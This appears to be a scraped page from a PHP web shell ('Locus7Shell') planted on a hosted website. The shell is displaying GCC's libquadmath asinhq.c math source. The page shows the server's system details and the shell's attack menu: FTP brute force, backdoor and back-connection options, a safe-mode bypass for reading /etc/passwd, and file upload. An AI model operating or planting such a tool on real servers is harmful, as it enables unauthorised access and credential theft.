Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/libquadmath/math/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     asinhq.c (1.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* s_asinhl.c -- long double version of s_asinh.c.
 * Conversion to long double by Ulrich Drepper,
 * Cygnus Support, drepper@cygnus.com.
 */

/*
 * ====================================================
 * Copyright (C) 1993 by Sun Microsystems, Inc. All rights reserved.
 *
 * Developed at SunPro, a Sun Microsystems, Inc. business.
 * Permission to use, copy, modify, and distribute this
 * software is freely granted, provided that this notice
 * is preserved.
 * ====================================================
 */

#if defined(LIBM_SCCS) && !defined(lint)
static char rcsid[] = "$NetBSD: $";
#endif

/* asinhq(x)
 * Method :
 *      Based on
 *              asinhq(x) = signl(x) * logq [ |x| + sqrtq(x*x+1) ]
 *      we have
 *      asinhq(x) := x  if  1+x*x=1,
 *                := signl(x)*(logq(x)+ln2)) for large |x|, else
 *                := signl(x)*logq(2|x|+1/(|x|+sqrtq(x*x+1))) if|x|>2, else
 *                := signl(x)*log1pq(|x| + x^2/(1 + sqrtq(1+x^2)))
 */

#include "quadmath-imp.h"

static const __float128
  one = 1,
  ln2 = 6.931471805599453094172321214581765681e-1Q,
  huge = 1.0e+4900Q;

__float128
asinhq (__float128 x)
{
  __float128 t, w;
  int32_t ix, sign;
  ieee854_float128 u;

  u.value = x;
  sign = u.words32.w0;
  ix = sign & 0x7fffffff;
  if (ix == 0x7fff0000)
    return x + x;        /* x is inf or NaN */
  if (ix < 0x3fc70000)
    {                /* |x| < 2^ -56 */
      math_check_force_underflow (x);
      if (huge + x > one)
    return x;        /* return x inexact except 0 */
    }
  u.words32.w0 = ix;
  if (ix > 0x40350000)
    {                /* |x| > 2 ^ 54 */
      w = logq (u.value) + ln2;
    }
  else if (ix >0x40000000)
    {                /* 2^ 54 > |x| > 2.0 */
      t = u.value;
      w = logq (2.0 * t + one / (sqrtq (x * x + one) + t));
    }
  else
    {                /* 2.0 > |x| > 2 ^ -56 */
      t = x * x;
      w = log1pq (u.value + t / (one + sqrtq (one + t)));
    }
  if (sign & 0x80000000)
    return -w;
  else
    return w;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0059 ]--